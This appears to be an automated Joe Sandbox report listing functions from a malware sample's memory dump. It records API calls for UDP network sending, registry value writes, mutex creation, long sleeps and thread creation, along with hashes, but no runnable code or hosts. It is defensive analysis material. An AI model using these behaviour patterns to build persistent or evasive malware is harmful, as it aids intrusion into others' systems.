                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: DeleteEnumValue$Open
                                • String ID:
                                • API String ID: 3197069048-0
                                • Opcode ID: 3dec9c815a024576ae3783739863fa353311bfd75c057c0a3e4ad06c4e751d30
                                • Instruction ID: 4c28fe92a2ed5dc868e926c50f9c2d227f411bff9f97900945fbff37c5cd7ae4
                                • Opcode Fuzzy Hash: 3dec9c815a024576ae3783739863fa353311bfd75c057c0a3e4ad06c4e751d30
                                • Instruction Fuzzy Hash: 75311CB5900208EBDF24DF94DC99FEE77B8AB48704F10C588A715AB181D7B49648CF54
                                Function 02B62FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 192networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1287 2b62fa0-2b6301b call 2b73600 socket 1290 2b632b6-2b632bd 1287->1290 1291 2b63021-2b6304f call 2b62745 1287->1291 1292 2b632bf-2b632c5 1290->1292 1293 2b632cc-2b632db 1290->1293 1291->1290 1297 2b63055-2b6307b sendto 1291->1297 1292->1293 1297->1290 1298 2b63081-2b6309f 1297->1298 1299 2b630a9-2b630b3 1298->1299 1300 2b630c4-2b630d0 1299->1300 1301 2b630d2-2b630e5 1300->1301 1302 2b630eb-2b630f7 1300->1302 1303 2b630e7 1301->1303 1304 2b630e9 1301->1304 1305 2b63124-2b63128 1302->1305 1306 2b630f9-2b63100 1302->1306 1303->1302 1304->1300 1305->1299 1309 2b6312e-2b63152 select 1305->1309 1306->1305 1308 2b63102-2b6311e 1306->1308 1308->1305 1310 2b63154-2b632d4 1309->1310 1311 2b63159-2b6318c 1309->1311 1310->1290 1311->1290 1314 2b63192-2b6319c 1311->1314 1314->1290 1315 2b631a2-2b631a9 1314->1315 1315->1290 1316 2b631af-2b631c1 1315->1316 1316->1290 1317 2b631c7-2b631ee call 2b62344 1316->1317 1317->1290 1320 2b631f4-2b6321e call 2b61046 1317->1320 1320->1290 1323 2b63224-2b6322e 1320->1323 1323->1290 1324 2b63234-2b6323e 1323->1324 1324->1290 1325 2b63240-2b6324a 1324->1325 1325->1290 1326 2b6324c-2b63277 call 2b72ceb 1325->1326 1329 2b632ac 1326->1329 1330 2b63279-2b63283 1326->1330 1329->1290 1330->1329 1331 2b63285-2b6328f 1330->1331 1331->1329 1332 2b63291-2b6329b 1331->1332 1332->1329 1333 2b6329d-2b632a9 call 2b62399 1332->1333 1333->1329
                                APIs
                                • socket.WS2_32(00000002,00000002,00000011), ref: 02B63008
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02B63072
                                • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 02B6314A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: selectsendtosocket
                                • String ID: @
                                • API String ID: 4221616969-2766056989
                                • Opcode ID: f39e8eedee454057849f98a2261c6dabc097c01456e66d4724b635d08ce40317
                                • Instruction ID: 92e42123d5c937a3895541d8fc85c08b38f66d5971b6a516175cf2a3e64668ab
                                • Opcode Fuzzy Hash: f39e8eedee454057849f98a2261c6dabc097c01456e66d4724b635d08ce40317
                                • Instruction Fuzzy Hash: E1819F71D081A88BEF28CB24CC947F9B7B5AF44714F4442D9E299AA2C0D7B85EC8CF51
                                Function 02B6DC56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02B6DC9D
                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02B6DCCB
                                • RegCloseKey.KERNEL32(?), ref: 02B6DCD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CloseOpenValue
                                • String ID: >
                                • API String ID: 779948276-325317158
                                • Opcode ID: f01ee12258c3602c3a30207e9e1a345556b2181ee65a9de0405e46da9aa1e186
                                • Instruction ID: 27aed057579cf11cccf5e3404ac91c512fe2c9b1aa433b68c806f8395f5c4809
                                • Opcode Fuzzy Hash: f01ee12258c3602c3a30207e9e1a345556b2181ee65a9de0405e46da9aa1e186
                                • Instruction Fuzzy Hash: 1C318FB5A50218EBDB20DB58DC48FF9B378EB59340F008AC9E6496B241D6F45ED4CF90
                                Function 02B61792 Relevance: 6.2, APIs: 4, Instructions: 214registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02B61938
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 33bdb4f922a3212c19a8701d8a349d277899aedb48a91e3116dd26d83c1efaae
                                • Instruction ID: 5d9a5528d8e6d4216430e320a8492880f5ca04ec4dbfd5fac87978ff7d56d59a
                                • Opcode Fuzzy Hash: 33bdb4f922a3212c19a8701d8a349d277899aedb48a91e3116dd26d83c1efaae
                                • Instruction Fuzzy Hash: 06917C75D44118EBDB28DB54CC89BEAB7B9EB58340F0049D8E719AB240D7B49AC4CFA0
                                Function 02B6DBCC Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 02B6DBEC
                                • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02B6DC08
                                • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 02B6DC26
                                • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02B6DC42
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$CreateOpen
                                • String ID:
                                • API String ID: 4052006930-0
                                • Opcode ID: 8de3985c2e15d552c614923b10160ae97f0c16a951050651d8eb9a7792e4d56d
                                • Instruction ID: 61b72b6cec8e6bdb61e9cdf951c193afe7cb7b49694cfabccc94c6c3899865af
                                • Opcode Fuzzy Hash: 8de3985c2e15d552c614923b10160ae97f0c16a951050651d8eb9a7792e4d56d
                                • Instruction Fuzzy Hash: 681118B9A4020CFBDB04DFE0D859FAE77B8AB48740F108948FB05AB181D7B09A14CB60
                                Function 00D507E8 Relevance: 4.8, APIs: 3, Instructions: 256sleepsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00D50902
                                • FindCloseChangeNotification.KERNEL32 ref: 00D5091A
                                • Sleep.KERNEL32(00002710), ref: 00D50925
                                Memory Dump Source
                                • Source File: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseCreateFindMutexNotificationSleep
                                • String ID:
                                • API String ID: 607942068-0
                                • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction ID: 6d82110f3067272ac406c902b8e35d0f0fc24ad3606d15d58415e20745d4d771
                                • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction Fuzzy Hash: 5FB16B75A002898FEF10CF14CD84BA93BA5FF54305F4C4915DC4DAF2A1D775AA88CB9A
                                Function 02B63D9B Relevance: 4.6, APIs: 3, Instructions: 90sleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 02B6F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,02B63DE7), ref: 02B6F067
                                  • Part of subcall function 02B6F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E
                                • Sleep.KERNEL32(000493E0,00000001), ref: 02B63DFE
                                • CreateThread.KERNEL32(00000000,00000000,02B63B41,00000000,00000000,00000000,00000000,00000000), ref: 02B63E78
                                • Sleep.KERNEL32(00000100), ref: 02B63ECA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CreateFileSleep$MappingThreadView
                                • String ID:
                                • API String ID: 3768528361-0
                                • Opcode ID: e1a6033c37280a82efed4fcb881ec580b699d57f76ff6dd6ac5fd4cd79a15600
                                • Instruction ID: f914c4d17b365f24f106985976229bf6d8d53919bfb90e3735c6ae9e5f2c126b
                                • Opcode Fuzzy Hash: e1a6033c37280a82efed4fcb881ec580b699d57f76ff6dd6ac5fd4cd79a15600
                                • Instruction Fuzzy Hash: 3B313FB0D44218DBDB20AB90ED497FA76B5EB10746F0044E8E3067B1C1DBB81AD4CE7A
                                Function 02B63FAA Relevance: 3.9, APIs: 3, Instructions: 175sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: c61255169513443e4db2d932c18a706cd183cd4ada0f5ce52f18c3f24b042259
                                • Instruction ID: 0f34f7ee918224eb202c835c357461042cdf6a2af0b2ad759bedaff176b9ac8d
                                • Opcode Fuzzy Hash: c61255169513443e4db2d932c18a706cd183cd4ada0f5ce52f18c3f24b042259
                                • Instruction Fuzzy Hash: 447170B1E106288BEF34CB14CC59BBAB7B6EB40304F1486E9D649B7280DB795AC5CF45
                                Function 02B6CC39 Relevance: 3.8, APIs: 3, Instructions: 24sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00001000), ref: 02B6CC41
                                  • Part of subcall function 02B6CB2D: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02B6CBB2
                                • Sleep.KERNEL32(00004E20), ref: 02B6CC64
                                • Sleep.KERNEL32(00057E40), ref: 02B6CC7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep$EnumValue
                                • String ID:
                                • API String ID: 3027011392-0
                                • Opcode ID: 47fae6bcfff435e465d6667bc3f21d5076a0873e61f70b6cc6218c26bd79df5e
                                • Instruction ID: 75066f9d9870516cea92df6b83eb26634faaa594d25b34898b288a2c401044f8
                                • Opcode Fuzzy Hash: 47fae6bcfff435e465d6667bc3f21d5076a0873e61f70b6cc6218c26bd79df5e
                                • Instruction Fuzzy Hash: ECE092B1980304E7E9003B60BD0EF373A66EB04783F044861F64A5E280DAB99460CA63
                                Function 00D697E8 Relevance: 3.3, APIs: 2, Instructions: 256memorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00D69902
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00D699B1
                                  • Part of subcall function 00D69BC1: KiUserExceptionDispatcher.NTDLL(?,00D69B69), ref: 00D69BC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: AllocCreateDispatcherExceptionMutexUserVirtual
                                • String ID:
                                • API String ID: 979207007-0
                                • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction ID: ce283121968292f5b68b5875ee6a707cd085acd7956b219e98ac12721d2d9e1a
                                • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction Fuzzy Hash: CBB15975A002898FEF10CF58CD94BA9B7E9FF55300F4C4515DC09AF2A1D776AA80CB6A
                                Function 02B659DE Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileStringA.KERNEL32(?,?,00000000,00000000,00000080,?), ref: 02B65A50
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 02B65AE5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: PrivateProfileString$Write
                                • String ID:
                                • API String ID: 2948465352-0
                                • Opcode ID: bb41c866433824d0c68b8d6742c49299a253832fa5d1650f9958f9f0e17d49ea
                                • Instruction ID: f739c8a90bd4746eaf5d633c3d862dc7dff796d081ddd6fa55a89530ea714a06
                                • Opcode Fuzzy Hash: bb41c866433824d0c68b8d6742c49299a253832fa5d1650f9958f9f0e17d49ea
                                • Instruction Fuzzy Hash: FF317172D40219EFDF50DB68D848BE6B7B9EB48340F108999F20AAB241DE745AA48F51
                                Function 02B6CA87 Relevance: 3.0, APIs: 2, Instructions: 46threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetDriveTypeA.KERNEL32(00000000), ref: 02B6CAF9
                                • RtlExitUserThread.NTDLL(00000000), ref: 02B6CB20
                                  • Part of subcall function 02B6BADD: Sleep.KERNEL32(?,?,?,?,00000000,Function_00013630,02BE0240,000000FF,?,02B6CB1B,00000003,00000000,00000000,00000000), ref: 02B6BB57
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: DriveExitSleepThreadTypeUser
                                • String ID:
                                • API String ID: 2502588859-0
                                • Opcode ID: 32921475f3dc35e00f19e49f87424f090b0d36d519fa158af43e6b4164d1983a
                                • Instruction ID: ce815aab537e108912746ce1a6245c498f09bc10f796f17673bb2cf966d5abea
                                • Opcode Fuzzy Hash: 32921475f3dc35e00f19e49f87424f090b0d36d519fa158af43e6b4164d1983a
                                • Instruction Fuzzy Hash: 2E1180319402189BDB259B58CC14BEAB7B9EB48B40F0409E9F709AB240DB716A54CF91
                                Function 02B6F030 Relevance: 3.0, APIs: 2, Instructions: 37fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,02B63DE7), ref: 02B6F067
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$CreateMappingView
                                • String ID:
                                • API String ID: 3452162329-0
                                • Opcode ID: bd9c292beccd62fc0abb3d35beeebeff91f0e86d4eec5c77b02f4a3033e123c6
                                • Instruction ID: 4ee2180dc9ef6948c4a86d81fa795bf4c4ac9055cbdd522e46a63cb1bbf4924e
                                • Opcode Fuzzy Hash: bd9c292beccd62fc0abb3d35beeebeff91f0e86d4eec5c77b02f4a3033e123c6
                                • Instruction Fuzzy Hash: AE019674A40208EBDB14CF84DA45F59B7B5FB48714F348688FA096B3C1C7B5AE41DB44
                                Function 02B6D570 Relevance: 2.6, APIs: 2, Instructions: 102memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,00015000), ref: 02B6D59D
                                  • Part of subcall function 02B67C71: MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00015400), ref: 02B67CA8
                                • GlobalFree.KERNELBASE(?), ref: 02B6D5E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Global$AllocFileFreeView
                                • String ID:
                                • API String ID: 3692339905-0
                                • Opcode ID: 4f28a2df2c7206a17fd28089550788b2834aac4aa5714aa7fdb83b4173017d98
                                • Instruction ID: d034ae3e039a093a3eeccf124f4341b615384c83888ee0128cb4710a0e933998
                                • Opcode Fuzzy Hash: 4f28a2df2c7206a17fd28089550788b2834aac4aa5714aa7fdb83b4173017d98
                                • Instruction Fuzzy Hash: D831A0B0E40305ABEB00EB94DC49BE977B5FB49724F044698F819BB380E7B95910CB66
                                Function 02B61970 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 02B61AA5
                                • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 02B61AD4
                                • RegCloseKey.KERNEL32(?), ref: 02B61AE6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$Close
                                • String ID:
                                • API String ID: 3391052094-0
                                • Opcode ID: 63af85517c312277ce55d94fd0e4ccc76f8a4f11135ed8072412d939274c6eef
                                • Instruction ID: cb50f2769446cec8e702903628ee9bb8da391e694a906365a51248b83282ebd3
                                • Opcode Fuzzy Hash: 63af85517c312277ce55d94fd0e4ccc76f8a4f11135ed8072412d939274c6eef
                                • Instruction Fuzzy Hash: 8E31F6B4D50118EFCB18DF18C849AE9B7B5AB58341F0485D8EB6EAB340D7359E91CFA0
                                Function 02B6CB2D Relevance: 1.6, APIs: 1, Instructions: 72registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02B6CBB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: EnumValue
                                • String ID:
                                • API String ID: 2814608202-0
                                • Opcode ID: 57b6e879d2b2355a640d12e34a793e1fff2d8d81a5a7f9d0d72108f66a189a4d
                                • Instruction ID: 8165775619f37745c115f93a985f7a887a047d212d3a2f9ace77f4cab33c8ab8
                                • Opcode Fuzzy Hash: 57b6e879d2b2355a640d12e34a793e1fff2d8d81a5a7f9d0d72108f66a189a4d
                                • Instruction Fuzzy Hash: 93218171D0021CEBDB20DB64CC89BE9BB79EB18700F0049D9E289AB181D7F85AC4CF90
                                Function 02B6FB41 Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 02B6FC06
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6FCD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: 677bb57565dc0406413e617f0e73fa3fee1b762aba5ed5dd21dafc710f938241
                                • Instruction ID: 3750e55f822cc0910b1d899f8c247d23e61411f42f1cba12d0d5ef2324a5e536
                                • Opcode Fuzzy Hash: 677bb57565dc0406413e617f0e73fa3fee1b762aba5ed5dd21dafc710f938241
                                • Instruction Fuzzy Hash: 5B11D771D41228EBDB24DF94ED8CBE9B7B5AB48304F1445D9E10AA6240C7B89BC4CF55
                                Function 02B6FB8B Relevance: 1.5, APIs: 1, Instructions: 36registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 02B6FC06
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: QueryValue
                                • String ID:
                                • API String ID: 3660427363-0
                                • Opcode ID: 997551ed1144cc253592e199200a1056f7e49b328e7237d2ea6919b830699af8
                                • Instruction ID: 1bc47307727b24a086a9feaee18d9fcc40af3cb91d203c45e40c8e06f954dd73
                                • Opcode Fuzzy Hash: 997551ed1144cc253592e199200a1056f7e49b328e7237d2ea6919b830699af8
                                • Instruction Fuzzy Hash: 7F01DAB1D41128ABDB24DB94EC8DBE9B7B9BB48304F1445C8E10AA6241C7B49BD4CF94
                                Function 02B67C71 Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                Download Yara Rule
                                APIs
                                • MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00015400), ref: 02B67CA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: FileView
                                • String ID:
                                • API String ID: 3314676101-0
                                • Opcode ID: 04e4a3146d183f692b52714b261ac81ce86f1cf94f7a20e0254c36310a7e592d
                                • Instruction ID: b3cd75486a98a555d3eba12b1c3687a784d82fd37672cdc18ea1d172140c355f
                                • Opcode Fuzzy Hash: 04e4a3146d183f692b52714b261ac81ce86f1cf94f7a20e0254c36310a7e592d
                                • Instruction Fuzzy Hash: 56F08C70D41308EBDB10DBA4E989BDDB778E704349F204584F5086B2C0D7B55A94DB40
                                Function 02B6F9B9 Relevance: 1.5, APIs: 1, Instructions: 33registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegSetValueExA.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 02B6FB14
